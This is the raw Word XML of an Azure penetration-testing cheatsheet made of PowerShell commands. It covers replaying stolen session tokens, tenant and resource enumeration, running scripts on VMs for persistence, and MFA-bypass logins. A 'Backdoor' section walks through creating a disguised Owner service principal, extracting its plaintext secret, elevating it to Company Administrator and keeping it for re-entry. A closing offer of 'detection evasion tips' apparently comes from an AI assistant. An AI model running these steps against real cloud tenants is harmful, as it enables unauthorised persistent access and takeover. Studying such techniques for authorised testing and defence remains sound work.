      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Penetration Testing Cheatsheet (PowerShell + CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE970BD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310E5D29">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96F467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🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Authentication &amp; Session Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2AE311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PowerShell (Az Module):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155E03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Import the Az module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56884E90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Import-Module Az</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463AD250" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A330D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Authenticate interactively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6496540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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762307F4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F5134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Optional: Use credentials (may bypass MFA in some cases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF24DF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$cred = Get-Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A599C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lastRenderedPageBreak/>
        <w:t>Connect-AzAccount -Credential $cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A3997" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75505A2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Import/export authentication context (for stolen sessions or replay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0682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Import-AzContext -Profile 'C:\Temp\LiveTokens\StolenToken.json'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8B17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Save-AzContext -Path 'C:\Temp\AzureAccessToken.json'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C90B3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0F18B5E7">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C57E9A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📅</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Account &amp; Subscription Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ACC36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all available contexts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2192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Get-AzContext -ListAvailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C6808" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CFB37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Current context details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F252E7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 = Get-AzContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5074F26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$context.Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3183816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$context.Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D072FAC" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BC8D4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all subscriptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57840A8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Get-AzSubscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F947F95" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EEF6D3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Switch subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423DBB0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Select-AzSubscription -SubscriptionId "&lt;SUBSCRIPTION_ID&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553C2872" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE88CC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role assignments (check privileges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CC52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Get-AzRoleAssignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4E29B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420727C0">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0621EE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📂</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Resource Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250AE8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all resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C456A9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17A129" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8E8E7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all resource groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC4CA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Get-AzResourceGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814E826" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151AD8F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storage accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202496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Get-AzStorageAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7E8A9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278CB982">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C358438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🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Web Apps &amp; AAD Apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E36A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Azure AD applications (client secrets, permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E247EF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Get-AzADApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09287838" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7098BAC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App Services (Web Apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E418A1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Get-AzWebApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B06CC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5CB57203">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620784D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📊</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. SQL Server &amp; Database Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B42B0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SQL Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E31AD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B894A2D" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEF704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lastRenderedPageBreak/>
        <w:t># List SQL Databases on a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B3E62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Get-AzSqlDatabase -ServerName &lt;SERVER_NAME&gt; -ResourceGroupName &lt;RG_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78925324" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208C838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firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E271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Get-AzSqlServerFirewallRule -ServerName &lt;SERVER_NAME&gt; -ResourceGroupName &lt;RG_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F33F0" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2088651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Azure AD Admins (lateral movement targets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B99FFB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Get-AzSqlServerActiveDirectoryAdministrator -ServerName &lt;SERVER_NAME&gt; -ResourceGroupName &lt;RG_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3CE58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37E3C95D">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FEF05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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Runbook Discovery (Automation Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C15F9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Automation Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E113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Get-AzAutomationAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866EBCF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7117A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List Runbooks in a specific Automation Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A6198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Get-AzAutomationRunbook -AutomationAccountName &lt;ACCOUNT_NAME&gt; -ResourceGroupName &lt;RG_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2DDCB5" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D78DA0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# Export Runbook for offline analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70521DC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Export-AzAutomationRunbook -AutomationAccountName &lt;ACCOUNT_NAME&gt; -ResourceGroupName &lt;RG_NAME&gt; -Name &lt;RUNBOOK_NAME&gt; -OutputFolder "C:\Temp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E560F" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D48386A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A938D7" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F64D2D" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Penetration Testing Cheatsheet: VMs, Networking, and Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB6C40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38B0BA52">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23748FDE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🖥️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtual Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C00F77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all Virtual Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E1D9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Get-AzVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666165F8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Get OS details for a specific VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4191C59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$vm = Get-AzVM -Name "VM-Name" -ResourceGroupName "RG-Name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105529C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$vm.OSProfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30E341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Execute commands on a VM (PowerShell script execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B094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Invoke-AzVMRunCommand -ResourceGroupName "RG-Name" -VMName "VM-Name" `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EFF2BD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-CommandId 'RunPowerShellScript' -ScriptPath './script.ps1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043FFF80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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires sufficient privileges (e.g., Contributor or higher). Use this to run enumeration or establish persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263985E0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EE8A4D7">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D1BAF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🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD7DDB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Virtual Networks (VNets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED1E6E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Get-AzVirtualNetwork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55948D3A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Public IP Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFACB6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Get-AzPublicIpAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A0662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lastRenderedPageBreak/>
        <w:t>Get ExpressRoute Circuit Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B3C0E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Get-AzExpressRouteCircuit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB6B6E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Get Azure VPN Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50551FD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Get-AzVpnConnection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB2925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Useful for mapping out hybrid infrastructure or pivoting opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A58973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E08D020">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96B2E7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🕳️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Backdoor: Service Principal Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A359C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Create a persistent Azure backdoor using a Service Principal with </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Company Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC79EE0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Step 1: Create a new Service Principal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E26E54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$spn = New-AzADServicePrincipal -DisplayName "WebService" -Role Owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65375A11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Step 2: Extract the plaintext secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178726B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$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E489C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$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78866E95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$UnsecureSecret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D3B6B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Step 3: Elevate the SPN (if possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ED6A4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$sp = Get-MsolServicePrincipal -AppPrincipalId "&lt;AppID&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20135A5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$role = Get-MsolRole -RoleName "Company Administrator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217EBEE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Add-MsolRoleMember -RoleObjectId $role.ObjectId `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EC6A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-RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C82F51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Step 4: Log in using the SPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CBFBC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$cred = Get-Credential  # Use AppID as username and $UnsecureSecret as password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608815A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Connect-AzAccount -Credential $cred -Tenant "&lt;Tenant-ID&gt;" -ServicePrincipal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB49A1D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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Persistence tip</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: This SPN remains active unless explicitly removed—use it for re-entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E892593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3255DEC">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E73467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Would you like me to append privilege escalation tactics or detection evasion tips for this section?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07639A81" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="132AF4B9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FB16F9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48AD5062" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF1983E" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/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📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure PenTest Cheatsheet: MSOnline PowerShell Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6A57CB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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>MSOnline</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> module is especially useful for targeting </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in legacy environments or where </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>MFA bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B6D559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2B912225">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51237F90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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setup &amp; Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E1950C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Import the MSOnline module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1FD01E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Import-Module MSOnline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FD1CF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Standard login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A0D3E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Connect-MsolService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEE3FB9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Alternate login to bypass MFA (if possible):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F915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$credential = Get-Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646CD0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Connect-MsolService -Credential $credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55348871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🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note: This method may work when MFA is misconfigured or conditional access is overly permissive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B633D67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lastRenderedPageBreak/>
        <w:pict w14:anchorId="79D79F22">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="093776E8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🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Account &amp; Directory Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD957A2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📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tenant &amp; Company Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4003A1EA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Get-MsolCompanyInformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66677375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👤</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List All Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C54D7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Get-MsolUser -All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139684F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👥</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List All Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62635A4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Get-MsolGroup -All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188ACC0E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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Members of Privileged Roles (e.g., Global Admins)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2F76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$role = Get-MsolRole -RoleName "Company Administrator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599D46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Get-MsolRoleMember -RoleObjectId $role.ObjectId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49755C4A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>Enumerate User Attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36624E90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Get-MsolUser -All | Format-List</w:t>
      </w:r>
    </w:p>
